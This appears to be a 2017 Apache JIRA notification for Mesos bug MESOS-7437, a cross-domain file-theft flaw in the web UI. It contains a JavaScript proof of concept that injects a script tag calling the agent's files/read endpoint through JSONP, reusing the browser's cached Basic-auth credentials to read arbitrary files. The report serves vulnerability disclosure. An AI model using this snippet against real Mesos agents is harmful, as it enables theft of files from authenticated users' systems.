Posted to issues@mesos.apache.org by "Jacob Janco (JIRA)" <ji...@apache.org> on 2017/05/02 21:27:04 UTC
[jira] [Updated] (MESOS-7437) cross domain file-theft in the web-ui
[ https://issues.apache.org/jira/browse/MESOS-7437?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Jacob Janco updated MESOS-7437:
-------------------------------
Priority: Major (was: Minor)
> cross domain file-theft in the web-ui
> -------------------------------------
>
> Key: MESOS-7437
> URL: https://issues.apache.org/jira/browse/MESOS-7437
> Project: Mesos
> Issue Type: Bug
> Components: security, webui
> Reporter: Jacob Janco
> Assignee: Jacob Janco
>
> {code:javascript}
> // Inject a <script> tag so the browser fetches the agent endpoint cross-origin, attaching its cached Basic-auth credentials
> x=document.createElement('script')
> // The jsonp parameter wraps the file contents in a callback call, so the response executes as script in the attacker page's origin
> x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
> document.body.appendChild(x)
> {code}
> The above code pasted into the web console on http://example.com/, for example, will yield the contents of the requested file. Basic auth is cached and resent in browser tabs/windows as long as the user has authenticated during the browser session.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)